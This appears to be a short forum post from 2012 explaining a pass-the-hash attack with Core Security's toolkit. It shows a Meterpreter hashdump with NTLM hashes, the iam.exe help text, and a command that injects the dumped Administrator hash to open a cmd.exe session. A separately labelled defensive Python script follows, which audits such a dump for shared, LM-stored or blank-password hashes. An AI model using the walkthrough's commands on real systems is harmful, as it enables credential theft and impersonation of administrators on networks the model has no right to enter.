HASH attack: Pass-The-Hash Toolkit
Posted on 2012-9-19 01:48:59

Download: http://oss.coresecurity.com/psht ... pshtoolkit_v1.4.tgz

First obtain the hashes with Metasploit:

  meterpreter > hashdump
  Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  brk:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:198637c481956d26764ca5b909854cfc:fd119afad3d4fd346550b862a9171f09:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:842e5689e6a7ea73811a50b4b5b88933:::
  meterpreter >
Then inject them with IAM.EXE:

  C:\pshtoolkit\iam>iam.exe -h
  IAM v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies
  iam.exe: option requires an argument -- h
  This tool changes the current session NTLM credentials.
  options:
          -h              username:domainname:LMhash:NThash
          -B              optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter. IAM.EXE will try to locate some memory locations instead of using hard-coded values.
          -H              this help.
          -D              enable debug info.
          -a              specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR (WARNING!: if you use the wrong values the system may crash)
          -r              <cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)

  Examples:
                  iam.exe -h administrator:mydomain:0102030405060708090A0B0C0D0E0F10:0102030405060708090A0B0C0D0E0F10

  or:

                  iam.exe -b -h administrator:mydomain:0102030405060708090A0B0C0D0E0F10:0102030405060708090A0B0C0D0E0F10

  C:\pshtoolkit\iam>
Usage:
iam.exe -h user:domain:hash
For example:

  C:\pshtoolkit\iam>iam.exe -b -h administrator:dis9:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 -r cmd.exe
This tool is very awkward to use and doesn't succeed often; it's enough to know it exists.



Play a thousand tunes and you will know music; examine a thousand swords and you will know a blade.
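As an added example (not part of the post or of the Core Security toolkit), a small Python audit over the hashdump output quoted in the post, showing from the defender's side why a dump like this is dangerous: it flags accounts that share one NT hash (one captured hash unlocks all of them), LM hashes still being stored, and blank passwords. The empty-LM and blank-password NT constants are the well-known values; the function names are my own.

```python
"""Audit a pwdump/hashdump listing for the conditions that make
pass-the-hash lateral movement cheap: one NT hash shared by several
accounts, LM hashes still stored, and blank passwords."""
from collections import defaultdict

# Well-known constants: "no LM hash stored" and the NT hash of the empty password.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
NT_BLANK = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: the hashdump lines quoted in the post above.
SAMPLE_DUMP = """\
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
brk:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:198637c481956d26764ca5b909854cfc:fd119afad3d4fd346550b862a9171f09:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:842e5689e6a7ea73811a50b4b5b88933:::
"""

def parse_pwdump(text):
    """Return (user, rid, lm, nt) tuples; skip lines not in user:rid:LM:NT::: form."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:   # both hashes are 16 bytes in hex
            continue
        entries.append((parts[0], int(parts[1]), lm, nt))
    return entries

def audit(entries):
    """Return a dict of findings keyed by category."""
    by_nt = defaultdict(list)
    for user, _rid, _lm, nt in entries:
        by_nt[nt].append(user)
    return {
        # same NT hash on several accounts: password reuse across accounts
        "shared_nt": {nt: u for nt, u in by_nt.items() if len(u) > 1 and nt != NT_BLANK},
        # a real LM hash means LM storage is still enabled on this host
        "lm_stored": [u for u, _r, lm, _n in entries if lm != LM_EMPTY],
        # NT hash of the empty string: the account has a blank password
        "blank_password": [u for u, _r, _l, nt in entries if nt == NT_BLANK],
    }

if __name__ == "__main__":
    for category, finding in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{category}: {finding}")
```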
